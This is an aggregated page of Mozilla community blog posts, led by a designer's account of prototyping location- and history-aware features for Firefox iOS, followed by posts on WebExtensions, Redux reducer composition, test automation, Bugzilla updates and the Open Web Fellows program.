Darrin HeneinPrototyping Firefox Mobile (or, Designers Aren’t Magicians)

I like to prototype things. To me—and surely not me alone—design is how something looks, feels, and works. These are very hard to gauge just by looking at a screen. Impossible, some would argue. Designs (and by extension, designers) solve problems. They address real needs. During the creative process, I need to see them in action, to hold them in my hand, on the street and on the train. In real life. So, as often as not, I need to build something.

Recently we’ve been exploring a few interesting ideas for Firefox Mobile. One advantage we have, as a mobile browser, is the idea of context—we can know where you are, what time it is, what your network connection is like—and more so than on other platforms utilize that context to provide a better experience. Not many people shop at the mall or wait in line at the bank with their laptop open, but in many of Firefox’s primary markets, people will have their phone with them. Some of this context could help us surface better content or shortcuts in different situations… we think.

The first step was to decide on scope. I sketched a few of these ideas out and decided which I would test as a proof of concept: location-aware shortcut links, a grouped history view, and some attempt at time-of-day recommendations. I wanted to test these ideas with real data (which, in my opinion, is the only legitimate way to test features of this nature), so I needed to find a way to make my history and other browser data available to my prototype. This data is available in our native apps, so whatever form my prototype took, it would need access to this data in some way. In many apps or products, the content is the primary focus of the experience, so making sure you shift from static/dummy content to real/dynamic content as quickly as possible is important. Edge cases like ultra-long titles or poor-quality images are real problems your design should address, and they will surface far sooner if you’re able to see your design with real content.

Next I decided (quickly) on some technology. The only criteria here was to use things that would get me to a testable product as quickly as possible. That meant using languages I know, frameworks to take shortcuts, and to ask for help when I was beyond my expertise. Don’t waste time writing highly abstracted, super-modular code or designing an entire library of icons for your prototypes… take shortcuts, use open-source artwork or frameworks, and just write code that works.

I am most comfortable with web technologies—I do work at Mozilla, after all—so I figured I’d make something with HTML and CSS, and likely some Javascript. However, our mobile clients (Firefox for Android and Firefox for iOS) are written in native code. I carry an iPhone most days, so I looked at our iOS app, which is written in Swift. I figured I could swap out one of the views with a web view to display my own page, but I still needed some way to get my browsing data (history, bookmarks, etc.) down into that view. Turns out, the first step in my plan was a bit of a roadblock.

Thankfully, I work with a team of incredible engineers, and my oft-co-conspirator Steph said he could put something together later that week. It took him an afternoon, I think. Onward. Even if I thought I could hack this together myself, I wasn’t sure, and didn’t want to waste time.

🔑 Whenever possible, use tools and frameworks you’ve used before. It sounds obvious, but I could tell you some horror stories of times where I wasted countless hours just trying to get something new to work. Save it for later.

In the meantime, I got my web stack all set up: using an off-the-shelf boilerplate for webpack and React (which I had used before), I got the skeleton of my idea together. Maybe overkill at this point, but having this in place would let me quickly swap new components in and out to test other ideas down the road, so I figured the investment was worth it. Because the location idea was not dependent on the user’s existing browser data, I could get started on that while Steph built the WebPanel for me.

Working for now in Firefox on the desktop, I used the Geolocation API to get the current coordinates of the user. Appending that to a Foursquare API url and performing a GET request, I now had a list of nearby locations. Using Lodash.js I filtered them to only include records with attached URLs, then sorted by proximity.

var query = "FoursquareAPI+MyClientID"

// inside a React component: filter nearby venues to those with URLs,
// sorted by proximity
navigator.geolocation.getCurrentPosition(function(position) {
  var ll = position.coords.latitude + "," + position.coords.longitude
  $.get(query + ll, function(data) {
    data = _.filter(data.response.venues, function(venue){
      return venue.url != null
    })
    this.setState({
      foursquareData: _.sortBy(data, function(venue){
        return venue.location.distance
      })
    })
  }.bind(this))
}.bind(this))


Step 1 of my prototype, done. Well, it worked in the desktop browser at least. I knew our mobile web view supported the same Geo API, so I was confident this would work there as well (and, it did).

At this point, Steph had built some stuff I could work with. By building a special branch of Firefox iOS, I now had a field in the settings app which let me define a URL which would load in one of my home panels instead of the default native views. One of the benefits of this approach is that I could update the web-app remotely and not have to rebuild/redeploy the native app with each change. And by using a tool like ngrok I could actually have that panel powered by a dev server running on my machine’s localhost.


Steph’s WebPanel.swift provided me with a simple API to query the native profile for data, seen here:

window.addEventListener("load", function () {
  window.mozAPI({
    method: "getSitesByLastVisit",
    params: {
      limit: 10000
    },
    callback: "receivedHistory"
  });
});

Here, I’m firing off a message to our mozAPI once the page has loaded, and passing it some parameters: the method I’d like to run and the limit on the number of records returned. Lastly, the name of a callback for the iOS app to pass the result of the query to.

window.receivedHistory = function(err, data) {
  // update the flux store with the history data passed down from native code
};

This is the callback in my app, which just updates the flux store with the data passed from the native code.

At this point, I had a flux-powered app that could display native browser data through react views. This was enough to get going with, and let me start to build some of the UI.

Steph had stubbed out the API for me and was passing down a JSONified collection of history visits, including the URL and title for each visit. To build the UI I had in mind, however, I needed the timestamps and icons, too. Thankfully, I contributed a few hundred lines of Swift to Firefox 1.0, and could hack these in:

extension Site: DictionaryView {
    func toDictionary() -> [String: AnyObject] {
        let iconURL = icon?.url != nil ? icon?.url : ""
        return [
            "title": title,
            "url": url,
            "date": NSNumber(unsignedLongLong: (latestVisit?.date)!),
            "iconURL": iconURL!,
        ]
    }
}

Which gave me the following JSON passed to the web view:

{
    title: "We’re building a better internet — Mozilla",
    url: "",
    date: "1454514630131",
    iconURL: "/media/img/favicon.52506929be4c.ico"
}

Firstly, try not to judge my Swift skills. The purpose here was to get it working as quickly as possible, not to ship this code. Hacks are allowed, and encouraged, when prototyping. I added a date and iconURL field to the history record object and before long, I was off to the races.

With timestamps and icons in hand, I could build the rest of the UI. A simple history view that batched visits by domain (so 14 Gmail links would collapse to 3 and “11 more…”), and a quick attempt at a time-based recommendation engine.

This algorithm may be ugly, but it naively does one thing: depending on the time of day and day of the week, it returns some guesses about which sites I may be interested in, based on past browsing behaviour. It worked by following these steps:

  1. Filter my entire history to only include visits from the same day type (weekday vs. weekend)
  2. Exclude domains that are useless, like or
  3. Further filter the set of visits to only include visits +/- some buffer around the current time: the initial prototype used a buffer of +/- one hour
  4. Group the visits by their TLD + one level of path, which gave me better groups to work with
  5. Sort these groups by length, to provide an array with the most popular domain at the beginning (and limit this output to the top n domains, 10 in my case)

The output is similar to the following:

[
  {
    domain: "",
    date: "Wed Feb 03 2016 10:54:02 GMT-0500",
    count: 3
  },
  {
    domain: "",
    date: "Wed Feb 03 2016 10:54:02 GMT-0500",
    count: 2
  }
]
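The steps above can be sketched roughly like this (hypothetical function and data shapes, not the prototype’s actual code; the real version used Lodash, and step 2’s domain blocklist is left out for brevity):

```javascript
// Naive time-of-day recommendations: filter history to visits made on
// the same day type and around the same time, group by host + first
// path segment, then rank groups by size.
function recommend(history, now, bufferMs, limit) {
  var isWeekend = function (d) { return d.getDay() === 0 || d.getDay() === 6; };
  var minuteOfDay = function (d) { return d.getHours() * 60 + d.getMinutes(); };
  var groups = {};
  history
    // Step 1: same day type (weekday vs. weekend)
    .filter(function (v) { return isWeekend(v.date) === isWeekend(now); })
    // Step 3: within +/- bufferMs of the current time of day
    .filter(function (v) {
      return Math.abs(minuteOfDay(v.date) - minuteOfDay(now)) * 60000 <= bufferMs;
    })
    // Step 4: group by host plus one level of path
    .forEach(function (v) {
      var key = v.url.split("/").slice(2, 4).join("/");
      (groups[key] = groups[key] || []).push(v);
    });
  // Step 5: most-visited groups first, capped at `limit`
  return Object.keys(groups)
    .map(function (k) { return { domain: k, count: groups[k].length }; })
    .sort(function (a, b) { return b.count - a.count; })
    .slice(0, limit);
}
```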

Awesome. Now I have a Foursquare-powered component at the top which lists nearby URLs. Below that, a component that shows me the 5 websites I visit most often around this time of day. And next, a component that shows my history in a slightly improved format, with domain-grouping and truncation of long lists of related visits. All with my actual data, ready for me to use this week and evaluate these ideas.
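The domain-grouping could work along these lines (a sketch with hypothetical names, not the code I shipped in the prototype):

```javascript
// Collapse consecutive visits to the same host into one group,
// keeping the first few and counting the rest as "N more…".
function batchByDomain(visits, maxShown) {
  var host = function (url) { return url.split("/")[2]; };
  var batches = [];
  visits.forEach(function (v) {
    var last = batches[batches.length - 1];
    if (last && last.domain === host(v.url)) {
      last.visits.push(v);
    } else {
      batches.push({ domain: host(v.url), visits: [v] });
    }
  });
  return batches.map(function (b) {
    return {
      domain: b.domain,
      shown: b.visits.slice(0, maxShown),
      more: Math.max(0, b.visits.length - maxShown)
    };
  });
}
```

So 14 consecutive Gmail visits become three rows plus an “11 more…” affordance.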

One problem surfaces, though. Any visits that are from another device (through Firefox Sync) have no icon attached to them (right now, we don’t sync favicons across devices), which leaves us with large series of visits with no icon. One of the hypotheses we want to confirm is that the favicon (among other visual cues) help the user parse and understand the lists of URLs we present them with.

🔑 Occasionally I’ll be faced with a problem like this: one where I know the desired outcome but haven’t tackled anything like it before, and so have low confidence in my ability to fix it quickly. I knew I needed some way to get icons for a set of URLs, but not how exactly that would work. At this point it’s crucial to remember one of the goals of a prototype: get to a testable artifact as quickly as possible. Often in this situation I’ll time-box myself: if I can get something working in a few hours, great. If not, move on or just fake it (maybe a preset group of icons I could assign at random would help address the question).

Again, I turned to my trusty toolbox, where I know the tools and how to use them. In this case that was Node and Express, and after a few hours I had an app running on Heroku with a simple API. I could POST an array of URLs to my endpoint /icons and my Node app would spin up a series of parallel tasks (using async.parallel). Each task would load the URL via Node’s request module and hand the HTML in the response over to cheerio, a server-side analog for jQuery. Using cheerio I could grab all the <meta> tags, check for a number of known values (‘icon’, ‘apple-touch-icon’, etc.) and grab the URL associated with each. While I was there, I figured I might as well capture a few other tags, such as Facebook’s Open Graph og:image tag.
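The extraction step can be sketched like this (the real app used cheerio on the fetched HTML; a naive regex scan stands in here so the example is self-contained, and the type labels are illustrative):

```javascript
// Scan HTML for <link rel="…icon…"> tags and og:image <meta> tags,
// returning the same icons/images shape the API responds with.
function extractIcons(html) {
  var results = { icons: [], images: [] };
  (html.match(/<link[^>]*>/gi) || []).forEach(function (tag) {
    var rel = (tag.match(/rel=["']([^"']+)["']/i) || [])[1];
    var href = (tag.match(/href=["']([^"']+)["']/i) || [])[1];
    if (rel && href && /icon/i.test(rel)) {
      results.icons.push({ type: rel, url: href });
    }
  });
  (html.match(/<meta[^>]*>/gi) || []).forEach(function (tag) {
    var prop = (tag.match(/property=["']([^"']+)["']/i) || [])[1];
    var content = (tag.match(/content=["']([^"']+)["']/i) || [])[1];
    if (prop === "og:image" && content) {
      results.images.push({ type: "og-image", url: content });
    }
  });
  return results;
}
```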

Once each of the parallel requests either completed or timed out, I combined all the extracted data into one JSON object and sent it back down the wire. A sample request may look like this:

POST to ‘/icons’

{ urls: [""] }

And the response would look like this (keyed to the URL so the app which requested it could associate icons/images with the right URL… the above array could contain any number of URLs, and the below response would just have more top-level keys):

{
  "": {
    "icons": [
      {
        "type": "shortcut-icon",
        "url": ""
      }, …
    ],
    "images": [
      {
        "type": "og-image",
        "url": ""
      }, …
    ]
  }
}

Again, maybe not the best API design, but it works and only took a few hours. I added a simple in-memory cache so that subsequent requests for icons or images for URLs we’ve already fetched are returned instantly and with no delay. The entire Express app was 164 lines of Javascript, including all requires, comments, and error handling. It’s also generic enough that I can now use it for other prototypes where metadata such as favicons or lead images are needed for any number or URLs.


So why do all this work? Easy: because we have to. Things that just look pretty have become a commodity, and beyond being nice to look at they don’t serve much purpose. As designers, product managers, engineers—anyone who makes things—we are responsible for delivering real value to our users: features and apps they will actually use, and when they use them, they will work well. They will work as expected, and even go out of their way to provide a moment of delight from time to time. It should be clear that the people who designed this “thing” actually used it. That it went through a number of iterations to get right. That it was no accident or coincidence that what you are holding in your hands ended up the way it is. That the designers didn’t just guess at how to solve the problem, but actually tried a few things to really understand it at a fundamental level.

Designers are problem solvers, not magicians. It is relatively cheap to pivot an idea or tweak an interface in the design phase, versus learning something in development (or worse, post-launch) and having to eat the cost of redesigning and rebuilding the feature. Simple ideas often become high-value features once their utility is seen with real use. Sometimes you get 95% of the way, and see how a minor revision can really push an idea across the finish line. And, realistically, sometimes great ideas on paper utterly flop in the field. Better to crash and burn in the hands of your trusted peers than out in the market, though.

Test your ideas, test them with real content or data, and test them with real people.

Air MozillaThe Joy of Coding - Episode 43

The Joy of Coding - Episode 43 mconley livehacks on real Firefox bugs while thinking aloud.

Laura de Reynal38 hours

From Bengaluru to Ahmedabad, immersed in the train ecosystem for 38 hours.

1608 km, 37:45 hours

Filed under: Mozilla, Photography, Research Tagged: Connected Spaces, ethnography, India, journey, mobile office, research, train

Robert O'Callahanrr 4.1.0 Released

This release mainly improves replay performance dramatically, as I documented in November. It took a while to stabilize for release, partly because we ran into a kernel bug that caused rr tests (and sometimes real rr usage) to totally lock up machines. This release contains a workaround for that kernel bug. It also contains support for the gdb find command, and fixes for a number of other bugs.

Mozilla Addons BlogWebExtensions in Firefox 46

We last updated you on our progress with WebExtensions when Firefox 45 landed in Developer Edition (Aurora), and today we have an update for Firefox 46, which landed in Developer Edition last week.

While WebExtensions will remain in an alpha state in Firefox 46, we’ve made lots of progress, with 40 bugs closed since the last update. As of this update, we are still on track for a milestone release in Firefox 48 when it hits Developer Edition. We encourage you to get involved early with WebExtensions, since this is a great time to participate in its evolution.

A focus of this release was quality. All code in WebExtensions now passes eslint, and we’ve fixed a number of issues with intermittent test failures and timeouts. We’ve also introduced new APIs in this release, including:

  • chrome.notifications.getAll
  • chrome.runtime.sendMessage
  • chrome.webRequest.onBeforeRedirect
  • chrome.tabs.move

Create customizable views

In addition to the new APIs, support was added for second-level popup views in bug 1217129, giving WebExtension add-ons the ability to create customizable views.

Check out this example from the Whimsy add-on:

Create an iFrame within a page

The ability to create an iFrame that is connected to the content script was added in bug 1214658. This allows you to create an iFrame within a rendered page, which gives WebExtension add-ons the ability to add additional information to a page, such as an in-page toolbar:


For additional information on how to use these additions to WebExtensions, (and WebExtensions in general), please check out the examples on MDN or GitHub.

Upload and sign on addons.mozilla.org (AMO)

WebExtension add-ons can now be uploaded to and signed on addons.mozilla.org (AMO). This means you can sign WebExtension add-ons for release. Listed WebExtension add-ons can be uploaded to AMO, reviewed, published and distributed to Firefox users just like any other add-on. The use of these add-ons on AMO is still in beta and there are areas we need to improve, so your feedback is appreciated in the forum or as bugs.

Get involved

Over the coming months we will work our way towards a beta in Firefox 47 and the first stable release in Firefox 48. If you’d like to jump in to help, or get your APIs added, please join us on our mailing list or at one of our public meetings, or check out this wiki page.

Air MozillaWebdev Extravaganza: February 2016

Webdev Extravaganza: February 2016 Once a month web developers across the Mozilla community get together (in person and virtually) to share what cool stuff we've been working on.

Henrik SkupinFirefox Desktop automation goals Q1 2016

As promised in my last blog post, I don’t want to blog only about the goals from past quarters, but also about planned work and what’s currently in progress. So this post will be the first to shed some light on my active work.

First, let’s get started with my goals for this quarter.

Execute firefox-ui-tests in TaskCluster

Now that our tests are located in mozilla-central, mozilla-aurora, and mozilla-beta, we want to see them run on a per-check-in basis, including on try. Usually you would set up Buildbot jobs to get the tasks you want running. But given that the build system will be moved to Taskcluster in the next couple of months, we decided to start directly with the new CI infrastructure.

So what will this look like, and how will mozmill-ci cope with it? For the latter, I can say that we don’t want to run more tests than we do right now. This is mostly due to our limited infrastructure, which I have to maintain myself. Needing to run firefox-ui-tests for each check-in on all platforms, and even for try pushes, would mean totally exceeding our machine capacity. Therefore we will continue to use mozmill-ci for now to test nightly and release builds for en-US, but also a couple of other locales. This might change later this year, when mozmill-ci can be replaced by running all the tasks in Taskcluster.

Anyway, for now my job is to get the firefox-ui-tests running in Taskcluster once a build task has finished. Although this can only be done for Linux right now, it shouldn’t matter much, given that nothing in our firefox-puppeteer package is platform-dependent so far. Expanding testing to other platforms should be trivial later on. For now the primary goal is to see the results of our tests in Treeherder and to let developers know what needs to be changed if, for example, UI changes cause a regression for us.

If you are interested in more details have a look at bug 1237550.

Documentation of firefox-ui-tests and mozmill-ci

We have been submitting our test results to Treeherder for a while now, and they are pretty stable. But the jobs are still listed as Tier-3 and are not taken care of by sheriffs. To reach the Tier-2 level we definitely need proper documentation for our firefox-ui-tests, and especially mozmill-ci. In case of test failures or build bustage, the sheriffs have to know what’s necessary to do.

Now that the dust caused by all the refactoring and moving of the firefox-ui-tests has settled a bit, we want to start working more with contributors again. To allow easy contribution I will create various project documentation showing how to get started and how to submit patches. Ultimately I want to see a Quarter of Contribution project for our firefox-ui-tests around the middle of this year. Let’s see how this goes…

More details about that can be found on bug 1237552.

Christian HeilmannAll the small things at Awwwards Amsterdam

Last week, I cut my holiday in the Bahamas short to go to the Awwwards conference in Amsterdam and deliver yet another fire and brimstone talk about performance and considering people outside of our sphere of influence.

Photo by Trine Falbe

The slides are on SlideShare:

The screencast of the talk is on YouTube:

I want to thank the organisers for allowing me to vent a bit and I was surprised to get a lot of good feedback from the audience. Whilst the conference, understandably, is very focused on design and being on the bleeding edge, some of the points I made hit home with a lot of people.

Especially the mention of Project Oxford and its possible implementations in CMS got a lot of interest, and I’m planning to write a larger article for Smashing Magazine on this soon.

Air MozillaMartes mozilleros, 02 Feb 2016

Martes mozilleros Reunión bi-semanal para hablar sobre el estado de Mozilla, la comunidad y sus proyectos. Bi-weekly meeting to talk (in Spanish) about Mozilla status, community and...

Just BrowsingEncapsulation in Redux: the Right Way to Write Reusable Components


Redux is one of the most discussed JavaScript front-end technologies. It has defined a few paradigms that vastly improve developer efficiency and give us a solid foundation for building apps in a simple yet robust way. No framework is perfect though, and even Redux has its drawbacks.

Redux has the special power of making you feel like a super-programmer who can effortlessly write flawless code. Enjoyable though this may be, it’s actually a huge issue, because it blinds you with its simplicity and may therefore lead to situations where your shiny code turns into an unmaintainable mess. This is especially true for those who are starting a new project without any prior experience with Redux.

Encapsulation Matters

Global application state is arguably the biggest benefit of Redux. On the other hand, it is a bit of a mind-bender because we were always told that global stuff is evil. Not necessarily: there is nothing wrong with keeping the entire application state snapshot in one place, as long as you don't break encapsulation. Unfortunately, with Redux this is all too easy.

Just imagine a simple case where we have a team of two people: Dan and Andre. Both of them were given the very simple task to implement an independent component. Dan is supposed to create Foo, and Andre is supposed to create Bar. Both of the components are similar in that they should contain only a button which acts as a toggle for some string. (Obviously this is an artificial example provided for illustrative purposes.)


Since the state of each component is distinct, and there are no dependencies between them, we can encapsulate them simply by using combineReducers. This gives each reducer its own slice of application state, so it can only access the relevant part: fooReducer will get foo and barReducer will get bar. Andre and Dan can work independently, and they can even open-source the components because they are completely self-contained.
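That slice isolation can be sketched like this (combineReducers is hand-rolled here rather than imported from Redux so the example stands alone; the reducer and action names follow the article):

```javascript
// Each reducer receives only its own slice of the state tree,
// so fooReducer can never read or write bar's state.
function combineReducers(reducers) {
  return function (state, action) {
    state = state || {};
    var next = {};
    Object.keys(reducers).forEach(function (key) {
      next[key] = reducers[key](state[key], action);
    });
    return next;
  };
}

function fooReducer(state, action) {
  state = state || { toggled: false };
  return action.type === "TOGGLE_FOO" ? { toggled: !state.toggled } : state;
}

function barReducer(state, action) {
  state = state || { toggled: false };
  return action.type === "TOGGLE_BAR" ? { toggled: !state.toggled } : state;
}

var rootReducer = combineReducers({ foo: fooReducer, bar: barReducer });
```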

But one day, some evil person (from marketing, no doubt) tells Andre that he must extend the app and should embed a Qux component in his Bar. Qux is a simple counter with a button that just increments a number when clicked. So far so good: Andre just needs to embed the Qux in his Bar and provide an isolated application state slice so that Bar does not know anything about the internal implementation of Qux. This ensures that the principle of encapsulation is not violated. The application state shape could look like this:

  {
    foo: {
      toggled: false
    },
    bar: {
      toggled: false,
      qux: {
        counter: 0
      }
    }
  }
However, there was one more requirement: Andre should also cooperate with Dan, because the counter must be incremented anytime Foo is toggled. Now it's getting more complicated, and it looks like some sort of interface will be needed.

Now we can see the problem with the way Redux blinds developers to potential architectural missteps. People tend to seize on the fact that Redux provides global application state. The simplest solution would therefore be to get rid of combineReducers and provide the entire application state to fooReducer, which could then increment counter directly in the bar branch of the app state tree. Naturally this is totally wrong and breaks the principle of encapsulation. You never want to do this, because the logic behind incrementing the counter may be much more complicated than it seems. As a result, this solution does not scale: anytime you change the implementation of qux, you'll need to change the implementation of foo as well, which is a maintainability nightmare.

"But wait!" I hear you saying. The whole point of Redux is that you can handle a given action in multiple reducers, right? This suggests that we should handle the TOGGLE_FOO action in quxReducer and increment the counter there. This is a bad idea for a couple of reasons.

For starters, Qux becomes coupled with Foo because it needs to know about Foo's internal details. More importantly, Reto Schläpfer makes a compelling case that it quickly becomes difficult to reason about code where the results of an action are spread across the codebase. It is much better to compose your reducers so that a higher-level reducer handles each action in a single place and delegates processing to one or more lower-level reducers.

Composition is the New Encapsulation

As you might have spotted, we are suggesting that in addition to composing components and composing state, we should compose reducers as well.

Concretely, this means that Andre needs to define a public interface for his Qux component: an incrementClicks function.

export const incrementClicks = quxState => ({...quxState, counter: quxState.counter + 1});

This implementation is completely encapsulated and is specific to the Qux component. The function is exported because it is part of the public interface. Now we use this function to implement the reducer:

const quxReducer = (quxState = {counter: 0}, { type }) => {
  switch (type) {
    case 'QUX_INCREMENT':
      return incrementClicks(quxState); // The public method is called
    default:
      return quxState;
  }
};

Because Bar embeds Qux's application state slice, barReducer is responsible for delegating all actions to quxReducer using straightforward function composition. The barReducer might look something like this:

const barReducer = (barState = {toggled: false}, action) => {
  const { type } = action;

  switch (type) {
    case 'TOGGLE_BAR':
      return {...barState, toggled: !barState.toggled};
    default:
      return {
        ...barState,
        qux: quxReducer(barState.qux, action) // Reducer composition
      };
  }
};

Now we are ready for some more advanced reducer composition, since we know that Qux should also increment when Foo is toggled. At the same time, we want Foo to be completely unaware of Qux's internals. We can define a top-level reducer that holds state for Foo and Bar and delegates the right portion of the app state to incrementClicks. Only rootReducer, which aggregates fooReducer and barReducer, will be aware of the interdependency between the two.

const rootReducer = (appState = {}, action) => {
  const { type } = action;

  switch (type) {
    case 'TOGGLE_FOO':
      return {
        foo: fooReducer(appState.foo, action),
        bar: {...appState.bar, qux: incrementClicks(appState.bar.qux)}
      };
    default:
      return {
        foo: fooReducer(appState.foo, action),
        bar: barReducer(appState.bar, action)
      };
  }
};

The default case acts exactly like combineReducers. The TOGGLE_FOO handler, on the other hand, glues the reducers together while handling the interdependency. There is still one line which is pretty ugly:

bar: {...appState.bar, qux: incrementClicks(appState.bar.qux)}

The problem is that this line depends on implementation details of Bar (state shape). We would rather encapsulate these details behind the public interface of the Bar reducer:

export const incrementClicksExposedByBar = barState => ({...barState, qux: incrementClicks(barState.qux)});  

And now it's just a matter of using the public interface:

    case 'TOGGLE_FOO':
      return {
        foo: fooReducer(appState.foo, action),
        bar: incrementClicksExposedByBar(appState.bar)
      };

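Putting the pieces together, the whole interaction can be exercised end-to-end. This is a condensed, self-contained sketch of the reducers above (fooReducer is filled in as a minimal toggle reducer, since its implementation is never shown here, and the Qux field is named counter to match the state shape shown earlier):

```javascript
// Qux's public interface: the only sanctioned way to bump its counter.
const incrementClicks = quxState => ({ ...quxState, counter: quxState.counter + 1 });

const quxReducer = (quxState = { counter: 0 }, { type }) =>
  type === 'QUX_INCREMENT' ? incrementClicks(quxState) : quxState;

// Hypothetical minimal Foo reducer (not shown in the article).
const fooReducer = (fooState = { toggled: false }, { type }) =>
  type === 'TOGGLE_FOO' ? { ...fooState, toggled: !fooState.toggled } : fooState;

const barReducer = (barState = { toggled: false }, action) =>
  action.type === 'TOGGLE_BAR'
    ? { ...barState, toggled: !barState.toggled }
    : { ...barState, qux: quxReducer(barState.qux, action) }; // reducer composition

// Bar's public interface, hiding its state shape from the outside.
const incrementClicksExposedByBar = barState =>
  ({ ...barState, qux: incrementClicks(barState.qux) });

// Only the root reducer knows about the Foo -> Qux interdependency.
const rootReducer = (appState = {}, action) =>
  action.type === 'TOGGLE_FOO'
    ? {
        foo: fooReducer(appState.foo, action),
        bar: incrementClicksExposedByBar(appState.bar),
      }
    : {
        foo: fooReducer(appState.foo, action),
        bar: barReducer(appState.bar, action),
      };

let state = rootReducer(undefined, { type: '@@INIT' });
state = rootReducer(state, { type: 'TOGGLE_FOO' });
// state is now { foo: { toggled: true }, bar: { toggled: false, qux: { counter: 1 } } }
```

Note that toggling Foo increments the counter without Foo or Bar ever touching Qux's internals directly.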
I've prepared a complete working codepen so that you can try this out on your own.

Armen ZambranoEnd of MozCI QoC term

We recently completed another edition of Quarter of Contribution and I had the privilege to work with MikeLing, F3real & xenny.
I want to take a moment to thank all three of you for your hard work and contributions! It was a pleasure to work together with you during this period.

Some of the highlights of this term are:

You can see all the other mozci contributions here.

Some of the things I learned from this QoC term:
  • Prepare sets of related issues that build towards a goal or a feature.
    • The better you think this through, the easier it will be for you and the contributors.
    • In GitHub you can create milestones to group associated issues.
  • Remind contributors to review their own code.
    • This is something I try to do for my own patches, and it saves me from my own embarrassment :)
  • Ask contributors to test their code before requesting formal review.
    • It forces them to verify that the code does what they expect it to do.
  • Set expectations for review turnaround.
    • I could not review code every day since I had my own personal deliverables, so I set Monday, Wednesday and Friday as code review days.
It was a good learning experience for me and I hope it was beneficial for them as well.

Creative Commons License
This work by Zambrano Gasparnian, Armen is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 Unported License.

Byron Joneshappy bmo push day!

the following changes have been pushed to

  • [1243246] Attachment data submitted via REST API must always be base64 encoded
  • [1213424] The Bugzilla autocomplete dropdown should expand the width to show the full text of a match
  • [1241667] Trying to report a bug traps the user in an infinite loop
  • [1188236] “Congratulations on having your first patch approved” email should be clearer about how to get the patch landed.
  • [1243051] Create one off script to output cpanfile with all modules and their current versions to be used for version pinning
  • [1244604] configure nagios alerting for the bmo/reviewboard connector
  • [1244996] add a script to manage a user’s settings

discuss these changes on

Filed under: bmo, mozilla

Hannah KaneOur Evolving Approach to the Curriculum Database

When we first envisioned the Curriculum Database, we had a variety of different focuses. The biggest one, in my mind, was helping people sort through the many different types of learning materials offered by various teams and projects at Mozilla in order to find the right content for their needs. Secondarily, we wanted to improve the creation process—make it easier to publish, remix, and localize content.

Since then, the vision has changed a bit, or rather, our approach has changed. Several of our designers (Luke, Sabrina, and Ricardo) have been conducting a small research project to find out how educators currently find learning materials. We’ve also been learning from conversations with the cross-team Curriculum working group, led by Chad Sansing. Finally, we’ve been looking at existing offerings in the world.

Content Creation

Our approach has evolved so that now we’re focusing on content creation first. Luke and Chad have been working together to improve the web literacy curriculum template.

Luke also worked with the Science Lab team to design new templates for their learning handouts:

Next up is working with the Mozilla Clubs team to create new templates for their onboarding and training materials. The goal with each of these projects is to provide scalable, reusable templates that, once created and refined, don’t require involvement from designers or developers to continue using as new content is created. Right now we’re using a combination of Thimble projects, markdown -> html conversion, and github pages. We’re in experimentation mode.

Editing, localization, quality control, and more

Some of the next hurdles to cross are around mechanisms for localization and allowing for community contribution. One thing I’ve heard from the Curriculum working group is that collaborative editing workflows are needed. One idea I really like came from Emma Irwin who suggested an “Ask for Help” workflow that triggers a ticket in a github repo. That repo is triaged and curated by community contributors, so this could be a useful way to solicit testing and edits on new content.

I’ve also heard a (resolvable) tension between wanting to encourage remixes, but also wanting to have clear quality control mechanisms. User ratings and comments can help with this. Emma has also suggested an Education Council that would review materials and mark those meeting certain criteria as “Mozilla Approved.”

And then what?

All of the above ideas fall under the “content creation” half of the puzzle. We’ve not forgotten about the “content discovery” half, but we’ve put creation first. Once we’ve developed and tested these new workflows for creation, collaborative editing, remixing, quality control, and localization, it will make sense to then switch our focus to content distribution and discovery.

Please do comment below if you have any questions or ideas about this approach.

Mozilla Open Policy & Advocacy BlogAnnouncing the 2016 Open Web Fellows Program Host Organizations

Last year was a big year for the open Web: net neutrality became a mainstream phrase in the United States, data retention and surveillance were hotly contested at government levels in the European Union, and India’s government suspended Free Basics’ zero-rating practices despite Mark Zuckerberg’s insistence that he was working in the interest of the poor. Much of this was done in collaboration with organizations that share the mission to protect the open Web as a global public resource. Partnerships and knowledge-sharing initiatives like these support such movements.

One such initiative is the Ford-Mozilla Open Web Fellows program, an international leadership program that brings together technology talent and civil society organizations to advance and protect the open Web. The Fellows embedded at these organizations will work on salient issues like privacy, access, and online rights. This Fellowship program offers unique opportunities to learn, innovate, and gain credentials in a supportive environment while working to protect the open Web.

We are proud to announce our second cohort of host organizations, who are looking for 8 talented individuals to advise, build, and learn during their 10-month fellowships.

Apply now to become a Ford-Mozilla Open Web Fellow!
Deadline for applications: 11:59pm PST March 20, 2016

Centre for Intellectual Property and Information Technology Law (CIPIT)
CIPIT is an evidence-based research and training center based at Strathmore Law School in Nairobi, Kenya. Working with communities facing extreme instances of censorship, their mission is to study and share knowledge on the development of cyberspace, and to conduct research from a multidisciplinary approach. In 2016 CIPIT will be focusing on Internet Freedom in Eastern Africa, intellectual property in African development, and network measurements in election monitoring.

CIPIT is looking for an inquisitive, focused Fellow with tech expertise who can consult on a policy-oriented research process. This Fellow could help shape the next generation of Internet laws in Africa, and see the real-life needs of the tools and code they generate. For example, the Fellow could develop user-focused tools that help real-life events – like the Ugandan election. Learn more here.

Citizen Lab
Citizen Lab is an interdisciplinary laboratory based at the Munk School of Global Affairs, University of Toronto, that focuses on advanced research and development at the intersection of ICTs, human rights, and global security. They provide impartial, evidence-based, peer-reviewed research on information controls to support advocacy and policy engagement on an open and secure Internet, and help secure civil society organizations from targeted attacks.

Citizen Lab is looking for a Fellow who is motivated to apply their technical skills to questions concerning technology and human rights, and brings excellent communications and technical skills. The Fellow could develop new tools to measure Internet filtering and network interference, investigate malware attacks or the privacy and security of apps and social media, and empower citizens by developing platform for corporate and public transparency. Learn more here.

ColorOfChange
ColorOfChange is a leading civil rights organization that works to strengthen the voice of Black America and create positive change around political and social issues that affect the Black community. ColorOfChange supports net neutrality and the reclassification of broadband as a public utility, and works to give their members a voice — hugely consequential, as Black and brown Americans are least able to afford the paybooths and obstacles that come with a closed Internet.

ColorOfChange is looking for a Fellow who is passionate about ensuring the US national conversation around net neutrality includes arguments in favor of net neutrality from a civil rights perspective. This Fellow would have the opportunity to pioneer tools for rapid-response campaigning that could be replicated and used by millions, find a compelling approach for users to engage with data that is integrated in the presentation itself, and leverage mobile (and wearables??) for activism. Learn more here.

Data & Society
Data & Society is a research institute that is committed to identifying issues at the intersection of technology and society. They focus on social, cultural, and ethical issues arising from data-centric technological development. In 2016, they will focus on identifying major emergent issues stemming from new data-driven technologies, develop tools to help people better understand issues, and build a diverse network of researchers and practitioners.

